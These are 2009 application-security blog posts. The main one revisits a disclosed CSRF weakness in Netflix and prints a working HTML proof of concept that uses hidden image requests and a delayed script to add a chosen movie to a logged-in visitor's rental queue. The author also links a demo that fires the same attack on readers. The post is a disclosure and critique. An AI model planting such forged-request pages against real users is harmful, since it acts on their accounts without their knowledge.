Essentially, this behavior tells me that the tool accesses the cookies using JavaScript (or client-side script of some sort). Since Microsoft originated the concept of HttpOnly, you would think their tool would be able to handle it. Unfortunately, it does not, and I'm running the latest version (1.00.2188.0).

The Firefox Web Developer Toolbar, a great extension created by Chris Pederick, suffers from no such problems. Below are some screen shots to illustrate. Although it wasn't created for web application security professionals, it is an unbelievably useful tool and I highly recommend it. I often use it during application assessments to manipulate cookies, inspect forms, view all JavaScript, switch form actions from POSTs to GETs, and much more.

Friday, January 2, 2009

Netflix CSRF Revisited

A little more than two years ago, I notified Netflix about CSRF vulnerabilities on their web site. They fixed the most serious issues, such as using CSRF to change the account name and shipping address or to change the email address and password. I confirmed this with my testing at that time. However, I also noticed they had not implemented protection against using CSRF to add movies to a user's rental queue. I thought that was strange and concluded it was purposely left that way for business reasons.

I decided to revisit the issue this week by trying my original proof-of-concept CSRF attacks where any movie of an attacker's choice could be added to the top of the victim's queue. Sure enough, nothing has changed on that front. I think Netflix is risking reputation damage by not adding CSRF protection to the URL that invokes the "add movie" action.

Let's say you're logged into your Netflix account and are surfing around the Web. If you happen to encounter a page where someone has created HTML like the following, you will fall victim to a CSRF attack and have a potentially embarrassing movie arrive in your mailbox.

<html>
<head>
<script language="JavaScript" type="text/javascript">
function load_image2()
{
var img2 = new Image();
img2.src="http://www.netflix.com/MoveToTop?movieid=70110672&fromq=true";
}
</script>
</head>
<body>
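<!-- forged GET request that adds the movie to the victim's rental queue -->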
<img src="http://www.netflix.com/JSON/AddToQueue?movieid=70110672" width="1" height="1" border="0">
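<!-- two seconds later, load_image2() fires a second forged request that moves the movie to the top of the queue -->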
<script>setTimeout( 'load_image2()', 2000 );</script>
</body>
</html>

Now, if you are a Netflix subscriber and want to see this sucker in action, here's your chance!

First, make sure you're logged into your Netflix account. Next, click the following link and then go check the top of your Netflix rental queue.

click here if you're logged into Netflix and want to fall victim to CSRF

Thursday, January 1, 2009

Happy New Year

Happy New Year! It is 2009 and I've decided to celebrate by joining the 21st century and starting up a new blog on application security. It remains to be seen how often I will post, but hopefully it will prove interesting and/or useful to people.